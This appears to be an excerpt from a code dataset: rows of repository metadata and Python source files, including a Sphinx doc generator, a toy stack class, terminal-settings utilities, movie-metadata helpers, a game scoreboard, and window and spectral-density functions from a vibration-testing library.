# 2. = : Command name
# 3. -/- : Command description
# 4. - : Command sections (Examples, Notes)
header = """\
:orphan:
.. _python_commands:
===============================
Command line tools using Python
===============================
.. contents:: Page contents
:local:
:depth: 1
"""
command_rst = """
.. _{0}:
{0}
{1}
.. rst-class:: callout
{2}
"""
def generate_commands_rst(app=None):
from sphinx_gallery import sphinx_compatibility
out_dir = op.abspath(op.join(op.dirname(__file__), '..', 'generated'))
if not op.isdir(out_dir):
os.mkdir(out_dir)
out_fname = op.join(out_dir, 'commands.rst.new')
command_path = op.abspath(
op.join(os.path.dirname(__file__), '..', '..', 'mne', 'commands'))
fnames = sorted([
op.basename(fname)
for fname in glob.glob(op.join(command_path, 'mne_*.py'))])
iterator = sphinx_compatibility.status_iterator(
fnames, 'generating MNE command help ... ', length=len(fnames))
with open(out_fname, 'w') as f:
f.write(header)
for fname in iterator:
cmd_name = fname[:-3]
module = import_module('.' + cmd_name, 'mne.commands')
with ArgvSetter(('mne', cmd_name, '--help')) as out:
try:
module.run()
except SystemExit: # this is how these terminate
pass
output = out.stdout.getvalue().splitlines()
# Swap usage and title lines
output[0], output[2] = output[2], output[0]
# Add header marking
for idx in (1, 0):
output.insert(idx, '-' * len(output[0]))
# Add code styling for the "Usage: " line
for li, line in enumerate(output):
if line.startswith('Usage: mne '):
output[li] = 'Usage: ``%s``' % line[7:]
break
# Turn "Options:" into field list
if 'Options:' in output:
ii = output.index('Options:')
output[ii] = 'Options'
output.insert(ii + 1, '-------')
output.insert(ii + 2, '')
output.insert(ii + 3, '.. rst-class:: field-list cmd-list')
output.insert(ii + 4, '')
output = '\n'.join(output)
cmd_name_space = cmd_name.replace('mne_', 'mne ')
f.write(command_rst.format(
cmd_name_space, '=' * len(cmd_name_space), output))
_replace_md5(out_fname)
# This is useful for testing/iterating to see what the result looks like
if __name__ == '__main__':
generate_commands_rst()
| 2,239 | 0 | 69 |
4a9be3555eaaee67ccdb9ee787c8bae77b9e23da | 796 | py | Python | 2_stack.py | Akshatha-Jagadish/Data_structures | 3a2833e4f8ffa26127ba661708b45ccfac141484 | [
"MIT"
] | null | null | null | 2_stack.py | Akshatha-Jagadish/Data_structures | 3a2833e4f8ffa26127ba661708b45ccfac141484 | [
"MIT"
] | null | null | null | 2_stack.py | Akshatha-Jagadish/Data_structures | 3a2833e4f8ffa26127ba661708b45ccfac141484 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Jan 22 15:31:32 2022
@author: Akshatha
"""
if __name__ == '__main__':
my_stack = Stack()
my_stack.push(5)
my_stack.disp()
my_stack.push(10)
my_stack.disp()
my_stack.push('game')
my_stack.disp()
print('stack length: ',my_stack.length())
print('popped element: ',my_stack.pop())
my_stack.disp()
print('stack length: ',my_stack.length()) | 21.513514 | 46 | 0.53392 | # -*- coding: utf-8 -*-
"""
Created on Sat Jan 22 15:31:32 2022
@author: Akshatha
"""
class Stack():
def __init__(self):
self.arr = []
def push(self, value):
self.arr.append(value)
def pop(self):
val = self.arr[-1]
self.arr = self.arr[:-1]
return val
def length(self):
return len(self.arr)
def disp(self):
print(self.arr)
if __name__ == '__main__':
my_stack = Stack()
my_stack.push(5)
my_stack.disp()
my_stack.push(10)
my_stack.disp()
my_stack.push('game')
my_stack.disp()
print('stack length: ',my_stack.length())
print('popped element: ',my_stack.pop())
my_stack.disp()
print('stack length: ',my_stack.length()) | 174 | -7 | 184 |
317da283fcdc4837339ad34e5ee32af0b8601139 | 1,090 | py | Python | src/python/pants/console/stty_utils.py | lahosken/pants | 1b0340987c9b2eab9411416803c75b80736716e4 | [
"Apache-2.0"
] | 1 | 2021-11-11T14:04:24.000Z | 2021-11-11T14:04:24.000Z | src/python/pants/console/stty_utils.py | lahosken/pants | 1b0340987c9b2eab9411416803c75b80736716e4 | [
"Apache-2.0"
] | null | null | null | src/python/pants/console/stty_utils.py | lahosken/pants | 1b0340987c9b2eab9411416803c75b80736716e4 | [
"Apache-2.0"
] | 1 | 2021-11-11T14:04:12.000Z | 2021-11-11T14:04:12.000Z | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import subprocess
from contextlib import contextmanager
@contextmanager
def preserve_stty_settings():
"""Run potentially stty-modifying operations, e.g., REPL execution, in this contextmanager."""
stty_settings = STTYSettings()
stty_settings.save_stty_options()
yield
stty_settings.restore_ssty_options()
class STTYSettings(object):
"""Saves/restores stty settings, e.g., during REPL execution."""
| 29.459459 | 96 | 0.73945 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import subprocess
from contextlib import contextmanager
@contextmanager
def preserve_stty_settings():
"""Run potentially stty-modifying operations, e.g., REPL execution, in this contextmanager."""
stty_settings = STTYSettings()
stty_settings.save_stty_options()
yield
stty_settings.restore_ssty_options()
class STTYSettings(object):
"""Saves/restores stty settings, e.g., during REPL execution."""
def __init__(self):
self._stty_options = None
def save_stty_options(self):
self._stty_options = self._run_cmd('stty -g 2>/dev/null')
def restore_ssty_options(self):
self._run_cmd('stty ' + self._stty_options)
def _run_cmd(self, cmd):
po = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, _ = po.communicate()
return stdout
| 276 | 0 | 100 |
fb0177bda93cb54ce6c6923044aa8511c1218c01 | 1,179 | py | Python | flapp/movie/utils.py | rpwagner/tiled-display | 52d135bc163360fe55ce5521784b0ef48a8c82c9 | [
"Apache-2.0"
] | 1 | 2020-12-11T17:11:45.000Z | 2020-12-11T17:11:45.000Z | flapp/movie/utils.py | rpwagner/tiled-display | 52d135bc163360fe55ce5521784b0ef48a8c82c9 | [
"Apache-2.0"
] | null | null | null | flapp/movie/utils.py | rpwagner/tiled-display | 52d135bc163360fe55ce5521784b0ef48a8c82c9 | [
"Apache-2.0"
] | null | null | null | from subprocess import Popen, PIPE, STDOUT
if __name__=="__main__":
import sys
path = sys.argv[1]
duration = GetMovieDuration(path)
FPS = GetMovieFPS(path)
print "duration:", duration
print "FPS:", FPS
| 35.727273 | 132 | 0.63698 | from subprocess import Popen, PIPE, STDOUT
def GetMovieFPS(path):
#mplayer -vo null -nosound 0_0.mpg -ss 00:10:00 -endpos 00:00:01
output = Popen(["mplayer", "-vo", "null", "-nosound", path, "-endpos", "00:00:01"], stdout=PIPE, stderr=STDOUT).communicate()[0]
linestart = output.index("VIDEO: ")
lineend = linestart + output[linestart:].index("\n")
#print "line start,end:", linestart, lineend
line = output[linestart:lineend]
#print "line:", line
words = line.split()
#print "words:", words
fpsIndex = words.index("fps") - 1
fps = float(words[fpsIndex])
return fps
def GetMovieDuration(path):
output = Popen(["ffmpeg", "-i", path], stdout=PIPE, stderr=STDOUT).communicate()[0]
start = output.index("Duration: ")
end = output.index(", start: ")
duration = output[start+len("Duration: "):end]
hours, mins,secs = duration.split(":")
totalSecs = float(hours)* 60 * 60 + float(mins) * 60 + float(secs)
return totalSecs
if __name__=="__main__":
import sys
path = sys.argv[1]
duration = GetMovieDuration(path)
FPS = GetMovieFPS(path)
print "duration:", duration
print "FPS:", FPS
| 904 | 0 | 46 |
d1639147923531e200dc36009221eecdaf434140 | 1,931 | py | Python | dkbirdisland/src/scoreboard.py | Murilo-Gruppi/DonkeyKong-BirdIsland | 2fe5affe570e9d7c82d0f2e2e8b2c2e1ff49f1df | [
"MIT"
] | null | null | null | dkbirdisland/src/scoreboard.py | Murilo-Gruppi/DonkeyKong-BirdIsland | 2fe5affe570e9d7c82d0f2e2e8b2c2e1ff49f1df | [
"MIT"
] | 8 | 2020-11-14T13:06:58.000Z | 2021-01-22T14:31:06.000Z | dkbirdisland/src/scoreboard.py | Murilo-Gruppi/DonkeyKong-BirdIsland | 2fe5affe570e9d7c82d0f2e2e8b2c2e1ff49f1df | [
"MIT"
] | 3 | 2020-11-13T23:11:28.000Z | 2020-12-14T15:41:08.000Z | import shelve
import os
from . import tools
MAIN_DIR = os.path.split(os.path.abspath(__file__))[0]
SHELVE_PATH = os.path.join(MAIN_DIR, 'high_score.txt')
| 31.655738 | 94 | 0.588296 | import shelve
import os
from . import tools
MAIN_DIR = os.path.split(os.path.abspath(__file__))[0]
SHELVE_PATH = os.path.join(MAIN_DIR, 'high_score.txt')
class Scoreboard:
def __init__(self, screen):
self.score = '00000'
self.last_score = '00000'
self.high_score = '00000'
self.font = tools.load_font('ARCADEPI.ttf', 23)
self.color = (255, 255, 255)
d = shelve.open(SHELVE_PATH)
if 'hi' in d:
self.high_score = d['hi']
if 'score' in d:
self.last_score = d['score']
self.high_score_text = self.font.render(self.high_score, False, (255, 255, 255))
self.scoreboard = self.font.render(self.score, False, (255, 255, 255))
d.close()
def display(self, screen):
screen.blit(self.font.render("HI", False, (255, 255, 255)), (550, 5))
screen.blit(self.high_score_text, (590, 5))
screen.blit(self.scoreboard, (705, 5))
def update(self):
self.score = int(self.score) + 1
self.score = f'{self.score:05}'
self.scoreboard = self.font.render(self.score, False, (255, 255, 255))
def add(self):
d = shelve.open(SHELVE_PATH)
d['score'] = self.score
if int(self.score) > int(self.high_score):
d['hi'] = self.score
self.high_score = self.score
self.high_score_text = self.font.render(self.high_score, False, (255, 255, 255))
d.close()
def draw(self, screen, verify):
if verify:
self.color = (255, 255, 0)
self.scoreboard = self.font.render('NEW HI ' + self.last_score, False, self.color)
screen.blit(self.scoreboard, (586, 5))
else:
self.scoreboard = self.font.render(self.last_score, False, self.color)
screen.blit(self.scoreboard, (705, 5))
def new_hi(self):
return self.last_score == self.high_score
| 1,595 | -4 | 184 |
5bd889de96b25a5a3fe57826cba7a42808b9ad07 | 441 | py | Python | chopandmiddle.py | hadoge/simpleScripts_python | bc819dfd73a3fb62444c7915f8dab665930475c8 | [
"MIT"
] | null | null | null | chopandmiddle.py | hadoge/simpleScripts_python | bc819dfd73a3fb62444c7915f8dab665930475c8 | [
"MIT"
] | null | null | null | chopandmiddle.py | hadoge/simpleScripts_python | bc819dfd73a3fb62444c7915f8dab665930475c8 | [
"MIT"
] | null | null | null | #Script made for learn diferences on list modification
t = [2,1,3,4,5]
p = [2,1,3,4,5]
chop(p)
print(p)
print(chop(p))
middle(t)
print(t)
print(middle(t))
| 16.333333 | 82 | 0.589569 | #Script made for learn diferences on list modification
t = [2,1,3,4,5]
p = [2,1,3,4,5]
def chop(b):
a = (len(b)) - 1
del b[a]
del b[0]
return None #This function returns None, while the list is modified.
def middle(b):
a = (len(b)) - 1
return b[1:a] #This function returns a new Value, leaving the list unmodified
chop(p)
print(p)
print(chop(p))
middle(t)
print(t)
print(middle(t))
| 219 | 0 | 48 |
ed44fe26c8727b8eefba67eef26c7e2279a0496c | 41,686 | py | Python | vibrationtesting/signals.py | Vibration-Testing/vibrationtesting | b5b85bc036714e8d8e99a14a4ddc2c427dae80ee | [
"MIT"
] | 34 | 2016-06-21T11:44:26.000Z | 2021-09-29T07:28:22.000Z | vibrationtesting/signals.py | bagustris/vibrationtesting | b5b85bc036714e8d8e99a14a4ddc2c427dae80ee | [
"MIT"
] | 25 | 2017-08-26T14:07:16.000Z | 2021-07-27T09:57:31.000Z | vibrationtesting/signals.py | bagustris/vibrationtesting | b5b85bc036714e8d8e99a14a4ddc2c427dae80ee | [
"MIT"
] | 25 | 2016-03-08T19:58:11.000Z | 2021-08-01T23:03:41.000Z | """
Signal processing, creation and plotting.
Analysis of data and generation of simulated experiments.
"""
__license__ = "Joseph C. Slater"
__docformat__ = 'reStructuredText'
# import warnings
import numpy as np
import scipy as sp
import scipy.fftpack as fftpack
import scipy.linalg as la
import matplotlib.pyplot as plt
import scipy.integrate as spi
import scipy.signal as signal
"""
Notes:
------
Sept. 3, 2016
Development of windows in scipy.signal has been rapid and
determining what I should build into this module, or simply leverage
from scipy.signal has been a moving target.
It's now apparent that creating or returning a window is pointless. Further,
Applying should be a relatively simple code obviating much of any need for the
code here.
The cross spectrum analysis formerly lacking is now available, periodogram
is usually the best option, however not with impulse excitations. See
`scipy.signal` for this. Unfortunately, the conventions in this module are not
consistent with `scipy.signal`. They follow those of `python-control`
FRF calculation is typically trivial, Hv being an expected gap long term
MIMO FRF calculation is an open question. Pretty printing of FRFs is always
a welcome tool.
System ID is likely the remaining missing aspect at this time.
In order to be consistent with the Control Systems Library, increasing time
or increasing frequency steps positively with increased column number (one
dimension). Rows (0 dimension)
correspond to appropriate channels, output numbers, etc.
For cross spectrum data (cross spectrum density, frequency response function)
the 2 dimension represents the input channel.
The last dimension (2 or 3) indexes each data instance (experiment). That means
that an unaveraged cross spectrum density has dimension 4. If there is only a
single input channel, it is imperative to insist the dimention exist, even if
only length 1. This is analagous to a vector being Nx1 versus simply a
1-D array of length 1.
http://python-control.readthedocs.io/en/latest/conventions.html#time-series-data
Problem: This hasn't been fully implemented.
"""
def window(x, windowname='hanning', normalize=False):
r"""Create leakage window.
Create a window of length :math:`x`, or a window sized to match
:math:`x` that :math:`x\times w` is the windowed result.
Parameters
----------
x: integer, float array
| If integer- number of points in desired hanning windows.
| If array- array provides size of window returned.
windowname: string
One of: hanning, hamming, blackman, flatwin, boxwin
normalize: bool, optional(False)
Adjust power level (for use in ASD) to 1
Returns
-------
w: float array
| window array of size x
| window array. Windowed array is then :math:`x\times w`
Examples
--------
>>> import numpy as np
>>> import vibrationtesting as vt
>>> import matplotlib.pyplot as plt
>>> sample_freq = 1e3
>>> tfinal = 5
>>> fs = 100
>>> A = 10
>>> freq = 5
>>> noise_power = 0.001 * sample_freq / 2
>>> time = np.reshape(np.arange(0, tfinal, 1/sample_freq),(1,-1))
>>> xsin = A*np.sin(2*np.pi*freq*time)
>>> xcos = A*np.cos(2*np.pi*freq*time) # assembling individual records.
>>> x=np.dstack((xsin,xcos)) # assembling individual records. vstack
>>> xw=vt.hanning(x)*x
>>> fig, (ax1, ax2) = plt.subplots(2,1)
>>> ax1.plot(time.T,x[:,:,1].T)
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_ylim([-20, 20])
(-20, 20)
>>> ax1.set_title('Original (raw) data.')
Text(0.5,1,'Original (raw) data.')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
>>> ax2.plot(time[0,:],xw[0,:],time[0,:],vt.hanning(x)[0,:]*A,'--',
... time[0,:],-vt.hanning(x)[0,:]*A,'--')
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylabel('Hanning windowed $x(t)$')
Text(0,0.5,'Hanning windowed $x(t)$')
>>> ax2.set_xlabel('time')
Text(0.5,0,'time')
>>> ax2.set_title('Effect of window. Note the scaling to conserve ASD amplitude')
Text(0.5,1,'Effect of window. Note the scaling to conserve ASD amplitude')
>>> fig.tight_layout()
"""
if isinstance(x, (list, tuple, np.ndarray)):
"""Create Hanning windowing array of dimension `n` by `N` by `nr`
where `N` is number of data points and `n` is the number of number of
inputs or outputs and `nr` is the number of records."""
swap = 0
if len(x.shape) == 1:
# We have either a scalar or 1D array
if x.shape[0] == 1:
print("x is a scalar... and shouldn\'t have entered this \
part of the loop.")
else:
N = len(x)
f = window(N, windowname=windowname)
elif len(x.shape) == 3:
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('You shouldn\'t do that.')
print('The 1 dimension is the time (or frequency) \
incrementing dimension.')
print('Swapping axes temporarily to be compliant with \
expectations. I\'ll fix them in your result')
N = x.shape[1]
f = window(N, windowname=windowname)
f, _, _ = np.meshgrid(f, np.arange(
x.shape[0]), np.arange(x.shape[2]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
elif len(x.shape) == 2:
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('You shouldn\'t do that.')
print('The 1 dimension is the time (or frequency) ' +
'incrementing dimension.')
print('Swapping axes temporarily to be compliant with ' +
'expectations.')
print('I\'ll reluctantly return a transposed result.')
f = window(x.shape[1], windowname=windowname)
f, _ = np.meshgrid(f, np.arange(x.shape[0]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
else:
N = x
if windowname is 'hanning':
f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
elif windowname is 'hamming':
f = (0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1)))\
* np.sqrt(5000 / 1987)
elif windowname is 'blackman':
print('blackman')
f = (0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(N) + .5) / (N))
+ .08 * np.cos(4 * np.pi * (np.arange(N) + .5) / (N)))\
* np.sqrt(5000 / 1523)
elif windowname is 'flatwin':
f = 1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1))\
+ 1.286 * np.cos(4 * np.pi * (np.arange(N)) / (N - 1))\
- 0.338 * np.cos(6 * np.pi * (np.arange(N)) / (N - 1))\
+ 0.032 * np.cos(8 * np.pi * (np.arange(N)) / (N - 1))
elif windowname is 'boxwin':
f = np.ones((1, N))
else:
f = np.ones((1, N))
print("I don't recognize window name ", windowname, ". Sorry.")
if normalize is True:
f = f / la.norm(f) * np.sqrt(N)
return f
def hanning(x, normalize=False):
r"""Return hanning window.
Create a hanning window of length :math:`x`, or a hanning window sized to
match :math:`x` that :math:`x\times w` is the windowed result.
Parameters
----------
x: integer, float array
| If integer- number of points in desired hanning windows.
| If array- array provides size of window returned.
windowname: string
One of: hanning, hamming, blackman, flatwin, boxwin
normalize: bool, optional(False)
Adjust power level (for use in ASD) to 1
Returns
-------
w: float array
| window array of size x
| window array. Windowed array is then :math:`x\times w`
Examples
--------
>>> import numpy as np
>>> import vibrationtesting as vt
>>> import matplotlib.pyplot as plt
>>> sample_freq = 1e3
>>> tfinal = 5
>>> fs = 100
>>> A = 10
>>> freq = 5
>>> noise_power = 0.001 * sample_freq / 2
>>> time = np.reshape(np.arange(0, tfinal, 1/sample_freq),(1,-1))
>>> xsin = A*np.sin(2*np.pi*freq*time)
>>> xcos = A*np.cos(2*np.pi*freq*time)
>>> x=np.dstack((xsin,xcos)) # assembling individual records. vstack
>>> xw=vt.hanning(x)*x
>>> fig, (ax1, ax2) = plt.subplots(2, 1)
>>> ax1.plot(time.T,x[:,:,1].T)
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_ylim([-20, 20])
(-20, 20)
>>> ax1.set_title('Unwindowed data, 2 records.')
Text(0.5,1,'Unwindowed data, 2 records.')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
>>> ax2.plot(time[0,:],xw[0,:],time[0,:],vt.hanning(x)[0,:]*A,
... '--',time[0,:],-vt.hanning(x)[0,:]*A,'--')
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylabel('Hanning windowed $x(t)$')
Text(0,0.5,'Hanning windowed $x(t)$')
>>> ax2.set_xlabel('time')
Text(0.5,0,'time')
>>> ax2.set_title('Effect of window. Note the scaling to conserve ASD amplitude')
Text(0.5,1,'Effect of window. Note the scaling to conserve ASD amplitude')
>>> fig.tight_layout()
"""
if isinstance(x, (list, tuple, np.ndarray)):
"""Create Hanning windowing array of dimension n by N by nr
where N is number of data points and n is the number of number of
inputs or outputs and nr is the number of records."""
swap = 0
if len(x.shape) == 1:
# We have either a scalar or 1D array
if x.shape[0] == 1:
print("x is a scalar... and shouldn\'t have \
entered this part of the loop.")
else:
N = len(x)
f = hanning(N)
elif len(x.shape) == 3:
# print('a')
# print(f.shape)
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('Swapping axes temporarily to be compliant with \
expectations. I\'ll fix them in your result')
f = hanning(x.shape[1])
f, _, _ = np.meshgrid(f, np.arange(
x.shape[0]), np.arange(x.shape[2]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
elif len(x.shape) == 2:
# f,_=np.meshgrid(f[0,:],np.arange(x.shape[0]))
# print('b')
# print('length = 2')
# print(x.shape)
if x.shape[0] > x.shape[1]:
x = np.swapaxes(x, 0, 1)
swap = 1
print('Swapping axes temporarily to be compliant with \
expectations. I\'ll fix them in your result')
f = hanning(x.shape[1])
f, _ = np.meshgrid(f, np.arange(x.shape[0]))
if swap == 1:
f = np.swapaxes(f, 0, 1)
else:
# print(x)
# Create hanning window of length x
N = x
# print(N)
f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
if normalize is True:
f = f / la.norm(f) * np.sqrt(N)
return f
def blackwin(x):
"""Return the n point Blackman window.
Returns x as the Blackman windowing array x_window
The windowed signal is then x*x_window
"""
print('blackwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = blackwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
f = np.reshape((0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(n) + .5)) /
(n) + .08 * np.cos(4 * np.pi * (np.arange(n) + .5)) /
(n)) * np.sqrt(5000 / 1523), (1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def expwin(x, ts=.75):
"""Return the n point exponential window.
Returns x as the expwin windowing array x_windowed
The windowed signal is then x*x_window
The optional second argument set the 5% "settling time" of the window.
Default is ts=0.75
"""
print('expwin is untested')
tc = -ts / np.log(.05)
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = expwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
v = (n - 1) / n * np.arange(n) + (n - 1) / n / 2
f = np.exp(-v / tc / (n - 1))
f = f / la.norm(f) * np.sqrt(n)
f = np.reshape(f, (1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def hammwin(x):
"""Return the n point hamming window.
Returns x as the hamming windowingarray x_windowed
The windowed signal is then x*x_window
"""
print('hammwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = hammwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
f = np.reshape((0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(n)) /
(n - 1))) * np.sqrt(5000 / 1987),
(1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def flatwin(x):
"""Return the n point flat top window.
x_windows=flatwin(x)
Returns x as the flat top windowing array x_windowed
The windowed signal is then x*x_window
McConnell, K. G., "Vibration Testing: Theory and Practice," Wiley, 1995.
"""
print('flatwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = flatwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
f = np.reshape(
(1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(n)) / (n - 1))
+ 1.286 * np.cos(4 * np.pi * (np.arange(n)) / (n - 1))
- 0.338 * np.cos(6 * np.pi * (np.arange(n)) / (n - 1))
+ 0.032 * np.cos(8 * np.pi * (np.arange(n)) / (n - 1))),
(1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def boxwin(x):
"""Return the n point box window (uniform).
Returns x as the boxwin windowing array x_windowed
The windowed signal is then x*x_window
"""
print('boxwin is untested')
if isinstance(x, (list, tuple, np.ndarray)):
n = x.shape[1]
f = boxwin(n)
if len(x.shape) == 3:
f, _, _ = np.meshgrid(f[0, :], np.arange(
x.shape[0]), np.arange(x.shape[2]))
else:
f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
else:
n = x
# f=np.reshape((1.0-1.933*np.cos(2*np.pi*(np.arange(n))/(n-1))+1.286*np.cos(4*np.pi*(np.arange(n))/(n-1))-0.338*np.cos(6*np.pi*(np.arange(n))/(n-1))+0.032*np.cos(8*np.pi*(np.arange(n))/(n-1))),(1,-1))
f = np.reshape(np.ones((1, n)), (1, -1))
f = f / la.norm(f) * np.sqrt(n)
return f
def hannwin(*args, **kwargs):
"""Alternative for function `hanning`."""
return hanning(*args, **kwargs)
def asd(x, t, windowname="none", ave=bool(True)):
"""Return autospectrum (power spectrum) density of a signal x.
Parameters
----------
x : float array
Data array (n x N x m) where n is the number of sensors, m the
number of experiments.
t : float array
Time array (1 x N)
windowname : string
Name of windowing function to use. See `window`.
ave : bool, optional(True)
Average result or not?
Returns
-------
f : float array
Frequency vector (1 x N)
Pxx : float array
Autospectrum (n x N) or (n x N x m) if not averaged.
Examples
--------
>>> from scipy import signal
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy.linalg as la
Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by
0.001 V**2/Hz of white noise sampled at 1 kHz.
>>> sample_freq = 1e3
>>> tfinal = 5
>>> sig_freq=50
>>> A=10
>>> noise_power = 0.0001 * sample_freq / 2
>>> noise_power = A/1e12
>>> time = np.arange(0,tfinal,1/sample_freq)
>>> time = np.reshape(time, (1, -1))
>>> x = A*np.sin(2*np.pi*sig_freq*time)
>>> x = x + np.random.normal(scale=np.sqrt(noise_power),
... size=(1, time.shape[1]))
>>> fig, (ax1, ax2) = plt.subplots(2,1)
>>> ax1.plot(time[0,:],x[0,:])
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_title('Time history')
Text(0.5,1,'Time history')
>>> ax1.set_xlabel('Time (sec)')
Text(0.5,0,'Time (sec)')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
Compute and plot the autospectrum density.
>>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False))
>>> ax2.plot(freq_vec, 20*np.log10(Pxx[0,:]))
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylim([-400, 100])
(-400, 100)
>>> ax2.set_xlabel('frequency (Hz)')
Text(0.5,0,'frequency (Hz)')
>>> ax2.set_ylabel('PSD (V**2/Hz)')
Text(0,0.5,'PSD (V**2/Hz)')
If we average the last half of the spectral density, to exclude the
peak, we can recover the noise power on the signal.
"""
f, Pxx = crsd(x, x, t, windowname=windowname, ave=ave)
Pxx = Pxx.real
return f, Pxx
def crsd(x, y, t, windowname="none", ave=bool(True)):
"""
Calculate the cross spectrum (power spectrum) density between two signals.
Parameters
----------
x, y : arrays
Data array (n x N x m) where n is the number of sensors, m the
number of experiments.
t : array
Time array (1 x N)
windowname : string
Name of windowing function to use. See `window`.
ave : bool, optional
Average result or not?
Returns
-------
f : array
Frequency vector (1 x N)
Pxy : array
Autospectrum (n x N) or (n x N x m) if not averaged.
Examples
--------
>>> from scipy import signal
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy.linalg as la
Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by
0.001 V**2/Hz of white noise sampled at 1 kHz.
>>> sample_freq = 1e3
>>> tfinal = 5
>>> sig_freq=50
>>> A=10
>>> noise_power = 0.0001 * sample_freq / 2
>>> noise_power = A/1e12
>>> time = np.arange(0,tfinal,1/sample_freq)
>>> time = np.reshape(time, (1, -1))
>>> x = A*np.sin(2*np.pi*sig_freq*time)
>>> x = x + np.random.normal(scale=np.sqrt(noise_power),
... size=(1, time.shape[1]))
>>> fig = plt.figure()
>>> plt.subplot(2,1,1)
<matplotlib...>
>>> plt.plot(time[0,:],x[0,:])
[<matplotlib.lines.Line2D object at ...>]
>>> plt.title('Time history')
Text(0.5,1,'Time history')
>>> plt.xlabel('Time (sec)')
Text(0.5,0,'Time (sec)')
>>> plt.ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
Compute and plot the autospectrum density.
>>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False))
>>> plt.subplot(2,1,2)
<matplotlib...>
>>> plt.plot(freq_vec, 20*np.log10(Pxx[0,:]))
[<matplotlib.lines.Line2D object at ...>]
>>> plt.ylim([-400, 100])
(-400, 100)
>>> plt.xlabel('frequency (Hz)')
Text(0.5,0,'frequency (Hz)')
>>> plt.ylabel('PSD (V**2/Hz)')
Text(0,0.5,'PSD (V**2/Hz)')
>>> fig.tight_layout()
"""
# t_shape = t.shape
t = t.flatten()
if len(t) == 1:
dt = t
else:
dt = t[2] - t[1]
if dt <= 0:
print('You sent in bad data. Delta t is negative. \
Please check your inputs.')
if len(x.shape) == 1:
x = np.expand_dims(x, axis=0)
x = np.expand_dims(x, axis=2)
y = np.expand_dims(y, axis=0)
y = np.expand_dims(y, axis=2)
n = x.shape[1]
if windowname is False or windowname.lower() is "none":
win = 1
else:
# print('This doesn\'t work yet')
windowname = windowname.lower()
win = 1
if windowname == "hanning":
win = window(x, windowname='hanning')
elif windowname == "blackwin":
win = window(x, windowname='blackwin')
elif windowname == "boxwin":
win = window(x, windowname='boxwin')
elif windowname == "expwin":
win = window(x, windowname='expwin')
elif windowname == "hammwin":
win = window(x, windowname='hamming')
elif windowname == "triwin":
win = window(x, windowname='triwin')
elif windowname == "flatwin":
win = window(x, windowname='flatwin')
y = y * win
x = x * win
del win
ffty = np.fft.rfft(y, n, axis=1) * dt
fftx = np.fft.rfft(x, n, axis=1) * dt
Pxy = np.conj(fftx) * ffty / (n * dt) * 2
if len(Pxy.shape) == 3 and Pxy.shape[2] > 1 and ave:
Pxy = np.mean(Pxy, 2)
